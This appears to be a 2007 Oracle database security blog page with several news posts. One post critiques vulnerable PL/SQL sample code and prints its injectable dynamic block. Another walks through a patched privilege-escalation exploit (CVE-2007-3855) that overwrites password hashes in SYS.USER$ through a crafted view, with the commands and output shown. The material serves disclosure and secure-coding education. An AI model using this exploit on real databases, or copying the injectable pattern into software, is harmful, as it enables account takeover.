Red-Database-Security GmbH in Germany and PeteFinnigan.com Limited in the UK are pleased to announce an exclusive partnership to promote and sell services / training and products to give customers the best choices in securing Oracle databases. Pete Finnigan and Alex Kornbrust are both world leaders in the field of securing Oracle databases and this exclusive partnership will provide a stronger combined proposition for customers of both companies. Alex and Pete are pleased to announce an exclusive and exciting limited opportunity to attend a 5 day Oracle Anti Hacker training in London from October 29th to November 2nd. The places are limited so don’t miss this unique opportunity. See www.petefinnigan.com and www.red-database-security.com for more details and to register.“
Partnership between Red-Database-Security GmbH and PeteFinnigan.com Ltd.
August 21st, 2007David’s Whitepaper about Oracle Forensics
August 12th, 2007David Litchfield just released the 5th part of his Oracle Forensics whitepaper Finding Evidence of Data Theft in the Absence of Auditing. He describes how to find traces if the attacker used only SELECT statements.
Oracle 11g is available
August 10th, 2007Oracle 11g is now available for download (Linux so far only).
Best (insecure) Practice PL/SQL on OTN
Juli 31st, 2007You already know that I like to analyze other people’s code. On OTN I found a nice article (most popluar developer article) „Best Practice PL/SQL from Steven Feuerstein“ (http://www.oracle.com/technology/pub/columns/plsql/index.html).
Steven Feuerstein is a well-known expert on the Oracle PL/SQL language. His disclaimer says that „Do not take the advice and recommendations herein at face value. You should always build yourself a test case and run it on your database, for your schema, on your computer.“ That’s OK but even (or especially) sample code should be secure. Disclaimers are a simple but not a good solution.
Especially if the code is posted as „Best Practice“.
The best practice contains some PL/SQL sample code for download, e.g. str2list.
„The str2list package accepts your string, delimiter, and the name of your package-based collection. It deposits the parsed items in your string directly into your collection. The collection can either be declared in the package specification (publicly accessible) or you can define it in the package body and then provide procedures to add to and delete from the collection. These will be called by str2list to populate the collection properly. It’s a useful utility as well as a great example of dynamic PL/SQL block execution.“
As always the same problem: no input-validation in some of the procedures (e.g. showlist or parse). This could allow an attacker to run custom PL/SQL code. PL/SQL injection is more severe than SQL Injection. I know that writing secure code takes time but I think it’s worth to do this, especially for sample code which is often used by many people. Just adding a disclaimer is in my opinion not the right way to deal with vulnerabilities.
A quick analysis of the code str2list.pkg (Source is from March 2005) shows the following vulnerable code:
—————— str2list.pkg ————————————————————
PROCEDURE showlist (
pkg IN VARCHAR2,
firstrowproc IN VARCHAR2,
nextrowproc IN VARCHAR2,
getvalfunc IN VARCHAR2,
showproc IN VARCHAR2 := ‚pl‘,
datatype IN VARCHAR2 := ‚VARCHAR2(32767)‘
)
IS
dynblock VARCHAR2 (32767);
BEGIN
dynblock :=
‚DECLARE
indx PLS_INTEGER := ‚
|| pkg
|| ‚.‘
|| firstrowproc
|| ‚;
v_startloc PLS_INTEGER := 1;
v_item ‚
|| datatype
|| ‚;
BEGIN
LOOP
EXIT WHEN indx IS NULL;‘
|| showproc
|| ‚ (‚
|| pkg
|| ‚.‘
|| getvalfunc
|| ‚(indx));
indx := ‚
|| pkg
|| ‚.‘
|| nextrowproc
|| ‚(indx);
END LOOP;
END;‘;
EXECUTE IMMEDIATE dynblock;
EXCEPTION
WHEN OTHERS
THEN
disperr (dynblock);
END;—————— str2list.pkg ————————————————————
Exploit for Create View Problem published
Juli 22nd, 2007Andrea Purificato has published an exploit for the Create-View-Problem (DB17 aka CVE-2007-3855, bug found by Red-Database-Security). This issue was fixed with the July 2007 CPU.
The exploit updates the password hash in SYS.USER$ via a specially crafted view. But the exploit from Andrea does not work without additional steps because it is not supported to modify password hashes via an update command.
Example:
— We calculate the password hashes for the user RDS and the passwords RDS and HACKED with the makepwd command.
c:\tools>makepwd.exe RDS RDS
B2ABF50FCECAE7CB
c:\tools>makepwd.exe RDS HACKED
7B843A192FF96BE9
— Now we connect to the database and update the password hash via a specially crafted view.
SQL> connect cpu/cpu
Connected.
SQL> create or replace view bunkerview as
2 select x.name,x.password from sys.user$ x left outer join sys.user$ y on
x.name=y.name;
View created.
SQL> update cpu.bunkerview set password=’7B843A192FF96BE9′ where name =’RDS‘;
1 row updated.
SQL> commit;
Commit complete.
— The password is now changed to HACKED.
SQL> select password from sys.user$ where name=’RDS‘;
PASSWORD
——————————
7B843A192FF96BE9
— But the connect attempt throws an error message…
SQL> connect rds/hacked
ERROR:
ORA-01017: invalid username/password; logon denied
Warning: You are no longer connected to ORACLE.
— To activate the password change it is necessary to restart the database.
C:\>sqlplus rds/hacked
SQL*Plus: Release 10.2.0.3.0 – Production on Sun Jul 22 18:24:41 2007
Copyright (c) 1982, 2006, Oracle. All Rights Reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 – Production
With the Partitioning, OLAP and Data Mining Scoring Engine options
SQL>